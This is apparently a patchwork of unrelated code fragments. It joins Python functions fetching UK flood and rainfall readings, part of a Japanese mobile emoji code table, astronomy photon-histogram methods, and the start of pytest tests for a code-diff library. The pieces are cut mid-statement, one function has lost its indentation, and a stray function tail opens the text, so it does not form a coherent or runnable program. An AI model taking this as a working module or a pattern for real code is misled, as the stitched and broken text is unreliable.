        level_data = fetch(url)
        dump(level_data, cache_file)

    return level_data
def fetch_latest_rainfall_data(use_cache: bool = False) -> dict:
    '''
    Fetch latest rainfall levels from all measures (gauges).

    #### Arguments

    `use_cache` (bool, default = False): whether to use the most recently stored data
    instead of fetching new data

    #### Returns

    dict: JSON-formatted datasets of latest data at each gauge
    '''
    # URL for retrieving data
    ROOT_URL = "https://environment.data.gov.uk/flood-monitoring/id/measures"
    API_STR = "?parameter=rainfall"
    url = ROOT_URL + API_STR

    # exist_ok=True replaces the old try/except FileExistsError dance
    CACHE_DIR = 'cache/data'
    os.makedirs(CACHE_DIR, exist_ok=True)
    cache_file = os.path.join(CACHE_DIR, 'rainfall_water_level_data.json')

    # Attempt to load level data from file, otherwise fetch over internet (slower)
    if use_cache:
        try:
            # Attempt to load from file
            level_data = load(cache_file)
        except FileNotFoundError:
            level_data = fetch(url)
            dump(level_data, cache_file)
    else:
        level_data = fetch(url)
        dump(level_data, cache_file)

    return level_data
def fetch_measure_levels(station: Union[MonitoringStation, str], dt: datetime.timedelta,
        **warnings_kwargs: dict) -> tuple[list[datetime.datetime], list[float]]:
    '''
    Fetch measure levels for one station from latest reading and going back a period dt.
    If there are no measurements available within the specified period, returns ([None], [None]).

    #### Arguments

    `station` (Union[MonitoringStation, str]): either an input station instance or its measure_id string

    `dt` (datetime.timedelta): time period for which to look back in history for data

    #### Additional Kwargs and Flags

    `warnings_kwargs`: passed to `floodsystem.analysis.identify_potentially_bad_data()`

    #### Returns

    tuple[list[datetime.datetime], list[float]]: list of dates and their recorded levels, respectively

    #### Raises

    `TypeError`: if the input station was not a MonitoringStation or a str

    `RuntimeWarning`: if potentially bad data is detected from the station

    `RuntimeWarning`: if the station has not recorded any data within the given period dt
    '''
    if not isinstance(station, (MonitoringStation, str)):
        raise TypeError('The first argument must be either a `MonitoringStation` or a '
            f'measure_id string.\nGot value {station} of type {type(station)}')

    # Current time (UTC); the trailing 'Z' below marks the ISO string as UTC
    now = datetime.datetime.utcnow()
    # Start time for data
    start = now - dt

    # Construct URL for fetching data
    url_base = station.measure_id if isinstance(station, MonitoringStation) else station
    url_options = "/readings/?_sorted&since=" + start.isoformat() + 'Z'
    url = url_base + url_options

    # Fetch data
    data = fetch(url)
    if data['items']:
        stationdata = fetch(data['items'][0]['@id'])
        station_name = stationdata['items']['measure']['label'].split(' LVL ')[0].split(' - ')[0]
    else:
        warnings.warn(f'The API call to {url} returned an empty list of items (level data).'
            'The station may have been down during this time period; try a larger dt. ', RuntimeWarning)
        return [None], [None]

    # Extract dates and levels, oldest first
    dates, levels = [], []
    for measure in reversed(data['items']):
        # Convert date-time string to a datetime object
        dates.append(dateutil.parser.parse(measure['dateTime']))
        levels.append(measure['value'])

    # (the dead `flags = {}` pre-assignment was removed; flags is always
    # assigned here before use)
    flags = identify_potentially_bad_data(station_name, levels,
        station_obj=station if isinstance(station, MonitoringStation) else None,
        data_origin_type='RIVER_STATION', **warnings_kwargs)

    for flag in flags:
        warnings.warn('\n' + flag + '\n', RuntimeWarning)

    return dates, levels
def fetch_rainfall_levels(gauge: Union[RainfallGauge, str], dt: datetime.timedelta,
**warnings_kwargs: dict) -> tuple[list[datetime.datetime], list[float]]:
'''
Fetch rainfall for one gauge from latest reading and going back a period dt.
If there are no measurements available within the specified period, returns ([None], [None]).
#### Arguments
`gauge` (Union[RainfallGauge, str]): either an input station instance or its measure_id string
`dt` (datetime.timedelta): time period for which to look back in history for data
#### Additional Kwargs and Flags
`warnings_kwargs`: passed to `floodsystem.analysis.identify_potentially_bad_data()`
#### Returns
tuple[list[datetime.datetime], list[float]]: list of dates and their recorded levels, respectively
#### Raises
`TypeError`: if the input gauge was not a RainfallGauge or a str
`RuntimeWarning`: if potentially bad data is detected from the gauge
`RuntimeWarning`: if the gauge has not recorded any data within the given period dt
'''
if not isinstance(gauge, (RainfallGauge, str)):
raise TypeError('The first argument must be either a `RainfallGauge` or a '
f'measure_id string.\nGot value {gauge} of type {type(gauge)}')
# Current time (UTC)
now = datetime.datetime.utcnow()
# Start time for data
start = now - dt
# Construct URL for fetching data
url_base = gauge.measure_id if isinstance(gauge, RainfallGauge) else gauge
url_options = "/readings?_sorted&since=" | |
"F741",
"unicode" : "E525",
"jis-email" : "7722",
"sjis-email" : "EC41",
"utf-8" : "EF8181"
},
"184" : {
"number" : "184",
"name" : "5square",
"title" : u"\u56db\u89d2\u6570\u5b57\uff15",
"sjis" : "F742",
"unicode" : "E526",
"jis-email" : "7723",
"sjis-email" : "EC42",
"utf-8" : "EF8182"
},
"185" : {
"number" : "185",
"name" : "6square",
"title" : u"\u56db\u89d2\u6570\u5b57\uff16",
"sjis" : "F743",
"unicode" : "E527",
"jis-email" : "7724",
"sjis-email" : "EC43",
"utf-8" : "EF8183"
},
"186" : {
"number" : "186",
"name" : "7square",
"title" : u"\u56db\u89d2\u6570\u5b57\uff17",
"sjis" : "F744",
"unicode" : "E528",
"jis-email" : "7725",
"sjis-email" : "EC44",
"utf-8" : "EF8184"
},
"187" : {
"number" : "187",
"name" : "8square",
"title" : u"\u56db\u89d2\u6570\u5b57\uff18",
"sjis" : "F745",
"unicode" : "E529",
"jis-email" : "7726",
"sjis-email" : "EC45",
"utf-8" : "EF8185"
},
"188" : {
"number" : "188",
"name" : "9square",
"title" : u"\u56db\u89d2\u6570\u5b57\uff19",
"sjis" : "F746",
"unicode" : "E52A",
"jis-email" : "7727",
"sjis-email" : "EC46",
"utf-8" : "EF8186"
},
"189" : {
"number" : "189",
"name" : "10square",
"title" : u"\u56db\u89d2\u6570\u5b5710",
"sjis" : "F747",
"unicode" : "E52B",
"jis-email" : "7728",
"sjis-email" : "EC47",
"utf-8" : "EF8187"
},
"190" : {
"number" : "190",
"name" : "typhoon",
"title" : u"\u53f0\u98a8",
"sjis" : "F641",
"unicode" : "E469",
"jis-email" : "7522",
"sjis-email" : "EB41",
"utf-8" : "EEBD81"
},
"191" : {
"number" : "191",
"name" : "snowman",
"title" : u"\u3086\u304d\u3060\u308b\u307e",
"sjis" : "F65D",
"unicode" : "E485",
"jis-email" : "753E",
"sjis-email" : "EB5D",
"utf-8" : "EEBD9D"
},
"192" : {
"number" : "192",
"name" : "aries",
"title" : u"\u661f\u5ea7(\u304a\u3072\u3064\u3058\u5ea7)",
"sjis" : "F667",
"unicode" : "E48F",
"jis-email" : "7548",
"sjis-email" : "EB67",
"utf-8" : "EEBDA7"
},
"193" : {
"number" : "193",
"name" : "taurus",
"title" : u"\u661f\u5ea7(\u304a\u3046\u3057\u5ea7)",
"sjis" : "F668",
"unicode" : "E490",
"jis-email" : "7549",
"sjis-email" : "EB68",
"utf-8" : "EEBDA8"
},
"194" : {
"number" : "194",
"name" : "gemini",
"title" : u"\u661f\u5ea7(\u53cc\u5b50\u5ea7)",
"sjis" : "F669",
"unicode" : "E491",
"jis-email" : "754A",
"sjis-email" : "EB69",
"utf-8" : "EEBDA9"
},
"195" : {
"number" : "195",
"name" : "cancer",
"title" : u"\u661f\u5ea7(\u304b\u306b\u5ea7)",
"sjis" : "F66A",
"unicode" : "E492",
"jis-email" : "754B",
"sjis-email" : "EB6A",
"utf-8" : "EEBDAA"
},
"196" : {
"number" : "196",
"name" : "leo",
"title" : u"\u661f\u5ea7(\u3057\u3057\u5ea7)",
"sjis" : "F66B",
"unicode" : "E493",
"jis-email" : "754C",
"sjis-email" : "EB6B",
"utf-8" : "EEBDAB"
},
"197" : {
"number" : "197",
"name" : "virgo",
"title" : u"\u661f\u5ea7(\u304a\u3068\u3081\u5ea7)",
"sjis" : "F66C",
"unicode" : "E494",
"jis-email" : "754D",
"sjis-email" : "EB6C",
"utf-8" : "EEBDAC"
},
"198" : {
"number" : "198",
"name" : "libra",
"title" : u"\u661f\u5ea7(\u5929\u79e4\u5ea7)",
"sjis" : "F66D",
"unicode" : "E495",
"jis-email" : "754E",
"sjis-email" : "EB6D",
"utf-8" : "EEBDAD"
},
"199" : {
"number" : "199",
"name" : "scorpio",
"title" : u"\u661f\u5ea7(\u3055\u305d\u308a\u5ea7)",
"sjis" : "F66E",
"unicode" : "E496",
"jis-email" : "754F",
"sjis-email" : "EB6E",
"utf-8" : "EEBDAE"
},
"200" : {
"number" : "200",
"name" : "sagittarius",
"title" : u"\u661f\u5ea7(\u3044\u3066\u5ea7)",
"sjis" : "F66F",
"unicode" : "E497",
"jis-email" : "7550",
"sjis-email" : "EB6F",
"utf-8" : "EEBDAF"
},
"201" : {
"number" : "201",
"name" : "capricorn",
"title" : u"\u661f\u5ea7(\u3084\u304e\u5ea7)",
"sjis" : "F670",
"unicode" : "E498",
"jis-email" : "7551",
"sjis-email" : "EB70",
"utf-8" : "EEBDB0"
},
"202" : {
"number" : "202",
"name" : "aquarius",
"title" : u"\u661f\u5ea7(\u6c34\u74f6\u5ea7)",
"sjis" : "F671",
"unicode" : "E499",
"jis-email" : "7552",
"sjis-email" : "EB71",
"utf-8" : "EEBDB1"
},
"203" : {
"number" : "203",
"name" : "pisces",
"title" : u"\u661f\u5ea7(\u3046\u304a\u5ea7)",
"sjis" : "F672",
"unicode" : "E49A",
"jis-email" : "7553",
"sjis-email" : "EB72",
"utf-8" : "EEBDB2"
},
"204" : {
"number" : "204",
"name" : "ophiuchus",
"title" : u"\u661f\u5ea7(\u3078\u3073\u3064\u304b\u3044\u5ea7)",
"sjis" : "F673",
"unicode" : "E49B",
"jis-email" : "7554",
"sjis-email" : "EB73",
"utf-8" : "EEBDB3"
},
"205" : {
"number" : "205",
"name" : "atm",
"title" : u"\uff21\uff34\uff2d",
"sjis" : "F67B",
"unicode" : "E4A3",
"jis-email" : "755C",
"sjis-email" : "EB7B",
"utf-8" : "EEBDBB"
},
"206" : {
"number" : "206",
"name" : "24hours",
"title" : u"24HOURS(\u30b3\u30f3\u30d3\u30cb)",
"sjis" : "F67C",
"unicode" : "E4A4",
"jis-email" : "755D",
"sjis-email" : "EB7C",
"utf-8" : "EEBDBC"
},
"207" : {
"number" : "207",
"name" : "toilet",
"title" : u"\u30c8\u30a4\u30ec",
"sjis" : "F67D",
"unicode" : "E4A5",
"jis-email" : "755E",
"sjis-email" : "EB7D",
"utf-8" : "EEBDBD"
},
"208" : {
"number" : "208",
"name" : "parking",
"title" : u"\u30d1\u30fc\u30ad\u30f3\u30b0",
"sjis" : "F67E",
"unicode" : "E4A6",
"jis-email" : "755F",
"sjis-email" : "EB7E",
"utf-8" : "EEBDBE"
},
"209" : {
"number" : "209",
"name" : "busstop",
"title" : u"\u30d0\u30b9\u505c",
"sjis" : "F680",
"unicode" : "E4A7",
"jis-email" : "7560",
"sjis-email" : "EB80",
"utf-8" : "EEBE80"
},
"210" : {
"number" : "210",
"name" : "antenna",
"title" : u"\u30a2\u30f3\u30c6\u30ca(\u4f4d\u7f6e\u60c5\u5831\u30de\u30fc\u30af)",
"sjis" : "F681",
"unicode" : "E4A8",
"jis-email" : "7561",
"sjis-email" : "EB81",
"utf-8" : "EEBE81"
},
"211" : {
"number" : "211",
"name" : "harbor",
"title" : u"\u6e2f(\u3044\u304b\u308a\u30de\u30fc\u30af)",
"sjis" : "F682",
"unicode" : "E4A9",
"jis-email" : "7562",
"sjis-email" : "EB82",
"utf-8" : "EEBE82"
},
"212" : {
"number" : "212",
"name" : "bank",
"title" : u"\u9280\u884c",
"sjis" : "F683",
"unicode" : "E4AA",
"jis-email" : "7563",
"sjis-email" : "EB83",
"utf-8" : "EEBE83"
},
"213" : {
"number" : "213",
"name" : "gasstation",
"title" : u"\u30ac\u30b9\u30b9\u30bf\u30f3\u30c9",
"sjis" : "F78E",
"unicode" : "E571",
"jis-email" : "776E",
"sjis-email" : "EC8E",
"utf-8" : "EF828E"
},
"214" : {
"number" : "214",
"name" : "map",
"title" : u"\u5730\u56f3",
"sjis" : "F78F",
"unicode" : "E572",
"jis-email" : "776F",
"sjis-email" : "EC8F",
"utf-8" : "EF828F"
},
"215" : {
"number" : "215",
"name" : "bicycle",
"title" : u"\u81ea\u8ee2\u8eca",
"sjis" : "F687",
"unicode" : "E4AE",
"jis-email" : "7567",
"sjis-email" : "EB87",
"utf-8" : "EEBE87"
},
"216" : {
"number" : "216",
"name" : "bus",
"title" : u"\u30d0\u30b9",
"sjis" : "F688",
"unicode" : "E4AF",
"jis-email" : "7568",
"sjis-email" : "EB88",
"utf-8" : "EEBE88"
},
"217" : {
"number" : "217",
"name" : "superexpress",
"title" : u"\u65b0\u5e79\u7dda",
"sjis" : "F689",
"unicode" : "E4B0",
"jis-email" : "7569",
"sjis-email" : "EB89",
"utf-8" : "EEBE89"
},
"218" : {
"number" : "218",
"name" : "marathon",
"title" : u"\u30de\u30e9\u30bd\u30f3",
"sjis" : "F643",
"unicode" : "E46B",
"jis-email" : "7524",
"sjis-email" : "EB43",
"utf-8" : "EEBD83"
},
"219" : {
"number" : "219",
"name" : "soccer",
"title" : u"\u30b5\u30c3\u30ab\u30fc",
"sjis" : "F68F",
"unicode" : "E4B6",
"jis-email" : "756F",
"sjis-email" : "EB8F",
"utf-8" : "EEBE8F"
},
"220" : {
"number" : "220",
"name" : "tennis",
"title" : u"\u30c6\u30cb\u30b9",
"sjis" : "F690",
"unicode" : "E4B7",
"jis-email" : "7570",
"sjis-email" : "EB90",
"utf-8" : "EEBE90"
},
"221" : {
"number" : "221",
"name" : "snowboard",
"title" : u"\u30b9\u30ce\u30fc\u30dc\u30fc\u30c9",
"sjis" : "F691",
"unicode" : "E4B8",
"jis-email" : "7571",
"sjis-email" : "EB91",
"utf-8" : "EEBE91"
},
"222" : {
"number" : "222",
"name" : "checkerflag",
"title" : u"\u30c1\u30a7\u30c3\u30ab\u30fc\u30d5\u30e9\u30b0(\u30e2\u30fc\u30bf\u30fc\u30b9\u30dd\u30fc\u30c4)",
"sjis" : "F692",
"unicode" : "E4B9",
"jis-email" : "7572",
"sjis-email" : "EB92",
"utf-8" : "EEBE92"
},
"223" : {
"number" : "223",
"name" : "amusementpark",
"title" : u"\u904a\u5712\u5730",
"sjis" : "F645",
"unicode" : "E46D",
"jis-email" : "7526",
"sjis-email" : "EB45",
"utf-8" : "EEBD85"
},
"224" : {
"number" : "224",
"name" : "hotspring",
"title" : u"\u6e29\u6cc9",
"sjis" : "F695",
"unicode" : "E4BC",
"jis-email" : "7575",
"sjis-email" : "EB95",
"utf-8" : "EEBE95"
},
"225" : {
"number" : "225",
"name" : "bistro",
"title" : u"\u5c45\u9152\u5c4b(\u8d64\u3061\u3087\u3046\u3061\u3093)",
"sjis" : "F696",
"unicode" : "E4BD",
"jis-email" : "7576",
"sjis-email" : "EB96",
"utf-8" : "EEBE96"
},
"226" : {
"number" : "226",
"name" : "movie",
"title" : u"\u6620\u753b(\u304b\u3061\u3093\u3053)",
"sjis" : "F697",
"unicode" : "E4BE",
"jis-email" : "7577",
"sjis-email" : "EB97",
"utf-8" : "EEBE97"
},
"227" : {
"number" : "227",
"name" : "nightbridge",
"title" : u"\u591c\u306e\u6a4b",
"sjis" : "F698",
"unicode" : "E4BF",
"jis-email" : "7578",
"sjis-email" : "EB98",
"utf-8" : "EEBE98"
},
"228" : {
"number" : "228",
"name" : "tower",
"title" : u"\u6771\u4eac\u30bf\u30ef\u30fc",
"sjis" : "F699",
"unicode" : "E4C0",
"jis-email" : "7579",
"sjis-email" : "EB99",
"utf-8" : "EEBE99"
},
"229" : {
"number" : "229",
| |
bin_edges
widths_full = w1 - w0 # full bin wdiths
t = _np.zeros(len(w0), 'f8')
for tranges, wranges in zip(self.obs_times, self.obs_bandpasses):
tranges = _np.copy(tranges)
if time_ranges is not None:
tranges = utils.rangeset_intersect(time_ranges, tranges, presorted=True)
if len(tranges) == 0:
continue
# total exposure time for observation
dt = _np.sum(tranges[:,1] - tranges[:,0])
# avoid double-counting of overlapping orders. (user must call merge_orders t use multiple orders)
if len(wranges) > 1:
isort = _np.argsort(wranges[:,0])
wranges = wranges[isort,:]
wranges = reduce(utils.rangeset_union, wranges[1:], wranges[:1])
for wr in wranges:
# shift left edges of bins left of wr to wr[0], same for right edges right of wr[1]
# use copies to avoid modfying input bin_edges
_w0, _w1 = w0.copy(), w1.copy()
_w0[w0 < wr[0]] = wr[0]
_w1[w1 > wr[1]] = wr[1]
# recompute bin widths, now those fully outside of wr will have negative value, so set them to 0.0
widths_partial = _w1 - _w0
widths_partial[widths_partial < 0] = 0.0
# compute and add exposure times, using fractional of bin width after adjusting to wr vs original bin
# widths. this will cause bins outside of wr to get 0 exposure time, those inside to get full exposure
# time, and partial bins to get partial exposure time
fractions = widths_partial / widths_full
t += fractions*dt
return t
def clean_obs_times(self, bandpasses=None):
    """Return the union of all observation time ranges as a sorted,
    non-overlapping (N, 2) array.

    If `bandpasses` is given, only observations that fully cover every
    bandpass contribute; a ValueError is raised when none do.
    """
    # pick which observations contribute
    if bandpasses is None:
        range_lists = self.obs_times
    else:
        coverage = _np.all(self.check_wavelength_coverage(bandpasses), 0)
        if not _np.any(coverage):
            raise ValueError('No observations cover the provided bandpasses.')
        range_lists = [self.obs_times[i] for i in _np.nonzero(coverage)[0]]
    # stack everything and order by start time
    stacked = _np.vstack(range_lists)
    stacked = stacked[_np.argsort(stacked[:, 0]), :]
    # sweep through, merging any range that overlaps the growing tail
    merged = [stacked[0]]
    for rng in stacked[1:]:
        tail_end = merged[-1][-1]
        if rng[0] >= tail_end:
            merged.append(rng)            # disjoint: start a new interval
        elif rng[-1] > tail_end:
            merged[-1][-1] = rng[-1]      # overlap: extend the tail
        # else: fully contained in the tail interval, drop it
    return _np.vstack(merged)
def abstime(self, t):
    """Convert elapsed time(s) `t` (measured from `time_datum`) to
    absolute times.

    Bare numbers are interpreted in the units of the 't' column;
    quantities with units are converted to seconds directly.
    """
    # normalize to an astropy quantity in seconds
    if hasattr(t, 'unit'):
        t = t.to(_u.s)
    else:
        t = (t * self['t'].unit).to(_u.s)
    delta = _time.TimeDelta(t.value, format='sec')
    return self.time_datum + delta
#endregion
#region HIDDEN METHODS
def _get_proper_key(self, key):
    """Translate a user-supplied column name to the canonical field name.

    Exact column names pass through unchanged; otherwise the lowercased
    key is resolved through the `_alternate_names` table. Raises KeyError
    for unrecognized names.
    """
    # an exact match against existing columns wins outright
    if key in self.photons.colnames:
        return key
    lowered = key.lower()
    if lowered in self._alternate_names.values():
        return lowered
    if lowered in self._alternate_names:
        return self._alternate_names[lowered]
    raise KeyError('{} not recognized as a field name'.format(key))
def _get_ribbon_edges(self, ysignal, yback):
    """Merge signal and background extraction ribbons into sorted edges.

    Returns ``(edges, isignal, iback, area_ratio)``: the unique sorted
    ribbon edges, the indices of the edge bins containing the signal and
    background ribbons, and the signal-to-background area ratio
    (``iback`` and ``area_ratio`` are None when `yback` is None).
    Raises ValueError if ribbons overlap or extend beyond the counts.
    """
    # combine all ribbons and sort by lower edge
    ribbons = _np.array(sorted(list(ysignal) + list(yback), key=lambda r: r[0]))
    # adjacent ribbons may touch but never overlap
    if any(ribbons[:-1, 1] > ribbons[1:, 0]):
        raise ValueError('There is overlap in the signal and background regions. That\'s a no-no.')
    # collapse edges shared between adjacent ribbons
    edges = _np.unique(ribbons)
    if self['y'].max() < edges.max() or self['y'].min() > edges.min():
        raise ValueError('Extraction ribbons include areas beyond the range of the counts.')
    # locate the signal ribbons among the sorted edges via their midpoints
    isignal = _np.searchsorted(edges, (ysignal[:, 0] + ysignal[:, 1]) / 2.0)
    if yback is None:
        iback, area_ratio = None, None
    else:
        # signal-to-background area ratio for background subtraction
        area_signal = _np.sum(_np.diff(ysignal, axis=1))
        area_ratio = float(area_signal) / _np.sum(_np.diff(yback, axis=1))
        iback = _np.searchsorted(edges, (yback[:, 0] + yback[:, 1]) / 2.0)
    return edges, isignal, iback, area_ratio
def _compute_epera(self, units='erg'):
    """Return each photon's energy (in `units`) divided by its effective
    area.

    Weights are not applied and no distinction is made between background
    and signal counts. Raises ValueError if the photons lack effective
    area ('a') data.
    """
    if 'a' not in self:
        raise ValueError('Photons must have effective area data to permit the computation of fluxes.')
    # photon energy E = h*c/lambda, converted to the requested units
    photon_energy = (_const.h * _const.c / self['w']).to(units).value
    return photon_energy / self['a']
def _full_weights(self, fluxed=False, energy_units='erg'):
    """Return the per-photon weight vector.

    Combines the event weights ('e') and signal/background ribbon weights
    ('r') when those columns are present; if `fluxed`, also multiplies by
    energy per effective area so histograms yield fluxes.
    """
    weights = _np.ones(len(self), 'f8')
    # fold in whichever weighting columns this photon set carries
    for col in ('e', 'r'):
        if col in self:
            weights = weights * self[col]
    if fluxed:
        weights = weights * self._compute_epera(units=energy_units)
    return weights
def _groom_wbins(self, wbins, wranges=None, bin_method='elastic'):
    """Adjust wavelength bins to the observation bandpass(es).

    With a single (min, max) range, returns ``(bins, None)``. With a list
    of ranges, bins are groomed per range and concatenated; the second
    return value then gives the index of the last bin edge in each group
    (the gaps between groups).
    """
    if wranges is None:
        # default to the full span of all observation bandpasses
        stacked = _np.vstack(self.obs_bandpasses)
        wranges = [stacked.min(), stacked.max()]
    if not hasattr(wranges[0], '__iter__'):
        # single contiguous range
        return _groom_bins(wbins, wranges, bin_method=bin_method), None
    # multiple ranges: groom each separately and record group boundaries
    groups = []
    counts = [0]
    for rng in wranges:
        groomed = _groom_bins(wbins, rng, bin_method)
        counts.append(counts[-1] + len(groomed))
        groups.append(groomed)
    igaps = _np.array(counts[1:-1]) - 1
    return _np.hstack(groups), igaps
def _groom_ybins(self, ybins):
    """Groom cross-dispersion bins to span the full range of 'y' values."""
    y = self['y']
    return _groom_bins(ybins, [y.min(), y.max()], bin_method='partial')
def _construct_time_bins(self, time_step, bin_method, time_range=None, bandpasses=None):
    """Build time-bin edges of width `time_step` for each observation.

    Parameters
    ----------
    time_step
        Desired bin width, in the same units as the observation times.
    bin_method : {'elastic', 'full', 'partial'}
        'elastic' stretches bins so an integer number fills each exposure,
        'full' keeps only whole bins, 'partial' allows truncated end bins.
    time_range
        Optional (start, stop) limits; defaults to the span of all
        observations.
    bandpasses
        Optional bandpasses used to select contributing observations
        (passed through to `clean_obs_times`).

    Returns
    -------
    edges : 1-D array of bin edges (all observations concatenated)
    valid : integer indices of the bins that fall within an exposure
        (bins spanning the gap between observations are excluded)
    """
    if time_range is None:
        obs_times = _np.vstack(self.obs_times)
        time_range = [obs_times.min(), obs_times.max()]
    # check for valid input
    validspecs = ['elastic', 'full', 'partial']
    if bin_method not in validspecs:
        raise ValueError('binspec must be one of {}'.format(validspecs))
    dt = time_step
    edges, valid = [], []
    marker = 0
    for rng in self.clean_obs_times(bandpasses):
        # clip each observation's range to time_range; skip non-overlapping
        if rng[0] >= time_range[1] or rng[1] <= time_range[0]:
            continue
        if rng[0] < time_range[0]:
            rng[0] = time_range[0]
        if rng[1] > time_range[1]:
            rng[1] = time_range[1]
        # make bins for the observation
        span = rng[1] - rng[0]
        mid = (rng[0] + rng[1]) / 2.0
        n_exact = span / dt
        if bin_method == 'elastic':
            # FIX: linspace requires an integer count; np.round returns a
            # float, which raises TypeError on modern numpy
            n = int(round(n_exact)) if n_exact > 1 else 1
            obs_bins = _np.linspace(rng[0], rng[1], n + 1)
        else:
            if bin_method == 'full':
                n = int(_np.floor(n_exact))
            else:  # 'partial'
                n = int(_np.ceil(n_exact))
            if n == 0:
                continue
            # center the bins on the exposure midpoint
            start, stop = mid - n * dt / 2.0, mid + n * dt / 2.0
            obs_bins = _np.arange(start, stop + dt / 2.0, dt)
            if bin_method == 'partial':
                # truncate the first and last bins at the exposure limits
                obs_bins[[0, -1]] = rng
        # add bins to the list; only bins between this observation's edges
        # are valid
        edges.extend(obs_bins)
        valid.extend(range(marker, marker + len(obs_bins) - 1))
        marker += len(obs_bins)
    edges = _np.array(edges)
    # FIX: was `_np.array(valid, long)` -- `long` does not exist in Python 3
    valid = _np.array(valid, int)
    return edges, valid
def _bandpass_filter(self, bandpasses, check_coverage=True):
    """Return a boolean mask of photons whose wavelengths fall in any band.

    `bandpasses` is an Nx2 (or flat, even-length) sequence of
    [start, stop] wavelength pairs; bands must not overlap. When
    `check_coverage`, every band must be fully covered by every
    observation.
    """
    # groom bands input into an (N, 2) array
    bands = _np.array(bandpasses)
    if bands.ndim == 1:
        bands = bands.reshape(-1, 2)
    if check_coverage and not _np.all(self.check_wavelength_coverage(bands)):
        raise ValueError('Some bandpasses fall outside of the observation ranges.')
    # sort bands by start wavelength, then flatten to a 1-D edge list
    bands = bands[_np.argsort(bands, 0)[:, 0]]
    flat_edges = _np.ravel(bands)
    if any(flat_edges[1:] < flat_edges[:-1]):
        raise ValueError('Wavelength bands cannot overlap.')
    # a photon inside a band lands at an odd insertion index
    positions = _np.searchsorted(flat_edges, self['w'])
    return positions % 2 == 1
def _histogram(self, dim, bin_edges, rng, fluxed, energy_units, filter=None, background=False):
    """Histogram photons along one dimension with weights and errors.

    Parameters
    ----------
    dim
        Column to histogram (e.g. 't' or 'w').
    bin_edges
        Bin edges passed to numpy.histogram.
    rng
        (lo, hi) range limits; defaults to the outer bin edges.
    fluxed
        If True, weight by energy per effective area (fluxes).
    energy_units
        Units used when computing photon energies for fluxed output.
    filter
        Optional boolean mask selecting which photons to include.
    background
        If True, histogram only background-region counts (requires the
        'r' column; incompatible with `fluxed`).

    Returns
    -------
    counts, errors
        Weighted counts per bin and their Poisson-propagated errors.
    """
    x = self[dim]
    if background:
        if 'r' not in self:
            raise ValueError('Background region not defined for this photon set.')
        if fluxed:
            raise ValueError('Does not make sense to compute a fluxed background lightcurve.')
        # negative 'r' marks background-region photons
        weights = self['r'] < 0
        weights = weights.astype('f4')
    else:
        weights = self._full_weights(fluxed, energy_units)
    if rng is None:
        rng = bin_edges[[0,-1]]
    inrng = (x > rng[0]) & (x < rng[1])
    if filter is None:
        filter = _np.ones(len(self), bool)
    # drop masked, zero-weight, and out-of-range photons up front
    keep = filter & (weights != 0) & inrng
    x = x[keep]
    weights = weights[keep]
    weights[_np.isnan(weights)] = 0.
    counts = _np.histogram(x, bins=bin_edges, range=rng, weights=weights)[0]
    # variance of a weighted Poisson count is the sum of squared weights
    variances = _np.histogram(x, bins=bin_edges, range=rng, weights=weights**2)[0]
    # make sure zero or negative-count bins have conservative errors
    if _np.any(counts <= 0):
        if background:
            variances[variances == 0] = 1
        else:
            # estimate a per-bin average weight from signal-region photons,
            # interpolating across empty bins, and use its square as an
            # error floor for empty/negative bins
            signal = self['r'][keep] > 0 if 'r' in self else _np.ones(len(x), bool)
            signal_counts = _np.histogram(x[signal], bins=bin_edges, range=rng)[0]
            signal_counts_weighted = _np.histogram(x[signal], bins=bin_edges, range=rng, weights=weights[signal])[0]
            zeros = (signal_counts == 0)
            if any(zeros):
                signal_counts[zeros] = 1.0
                bin_midpts = (bin_edges[:-1] + bin_edges[1:]) / 2.0
                signal_counts_weighted[zeros] = _np.interp(bin_midpts[zeros], bin_midpts[~zeros], signal_counts_weighted[~zeros])
            avg_weight = signal_counts_weighted/signal_counts
            min_variance = avg_weight**2
            replace = (counts <= 0) & (variances < min_variance)
            variances[replace] = min_variance[replace]
    errors = _np.sqrt(variances)
    return counts, errors
def _Aeff_interpolator(self,filter=None):
w, a = self['w'], self['a']
if filter is not None:
w, a = w[filter], a[filter]
isort = _np.argsort(w)
w, a = | |
# <gh_stars>1-10
import code_diff as cd
from code_diff.diff_utils import parse_hunks
from code_diff import SStubPattern
# Util --------------------------------------------------------------
def compute_diff_sstub(diff):
    """Parse a unified diff and return the SStub pattern of its first hunk."""
    first_hunk = parse_hunks(diff)[0]
    ast_diff = cd.difference(first_hunk.before, first_hunk.after, lang="python")
    return ast_diff.sstub_pattern()
# Wrong Function name ----------------------------------------------
def test_wrong_function_name_1():
    """Renaming the function in a bare call is WRONG_FUNCTION_NAME."""
    test = """
    @@ -0,0 +0,0 @@ test
    - test()
    + test2()
    """
    assert compute_diff_sstub(test) == SStubPattern.WRONG_FUNCTION_NAME
def test_wrong_function_name_2():
    """Renaming a method in an attribute call is WRONG_FUNCTION_NAME."""
    test = """
    @@ -0,0 +0,0 @@ test
    - test.call()
    + test.call_async()
    """
    assert compute_diff_sstub(test) == SStubPattern.WRONG_FUNCTION_NAME
def test_wrong_function_name_3():
    """Renaming a method is WRONG_FUNCTION_NAME even when args are present."""
    test = """
    @@ -0,0 +0,0 @@ test
    - test.call_async('Hello World', x, x / 2)
    + test.call('Hello World', x, x / 2)
    """
    assert compute_diff_sstub(test) == SStubPattern.WRONG_FUNCTION_NAME
def test_wrong_function_name_4():
    """Renaming the caller object is NOT WRONG_FUNCTION_NAME."""
    test = """
    @@ -0,0 +0,0 @@ test
    - test_call.call('Hello World', x, x / 2)
    + test.call('Hello World', x, x / 2)
    """
    assert compute_diff_sstub(test) != SStubPattern.WRONG_FUNCTION_NAME
def test_wrong_function_name_5():
    """Renaming an intermediate attribute is NOT WRONG_FUNCTION_NAME."""
    test = """
    @@ -0,0 +0,0 @@ test
    - test.x.call('Hello World', x, x / 2)
    + test.y.call('Hello World', x, x / 2)
    """
    assert compute_diff_sstub(test) != SStubPattern.WRONG_FUNCTION_NAME
# Same Function more args -------------------------------------------
def test_same_function_more_args_1():
    """Adding the first argument is SAME_FUNCTION_MORE_ARGS."""
    test = """
    @@ -0,0 +0,0 @@ test
    - test()
    + test(x)
    """
    assert compute_diff_sstub(test) == SStubPattern.SAME_FUNCTION_MORE_ARGS
def test_same_function_more_args_2():
    """Adding a second argument is SAME_FUNCTION_MORE_ARGS."""
    test = """
    @@ -0,0 +0,0 @@ test
    - test(x)
    + test(x, y)
    """
    assert compute_diff_sstub(test) == SStubPattern.SAME_FUNCTION_MORE_ARGS
def test_same_function_more_args_3():
    """Modifying an existing argument is NOT SAME_FUNCTION_MORE_ARGS."""
    test = """
    @@ -0,0 +0,0 @@ test
    - test(x, y)
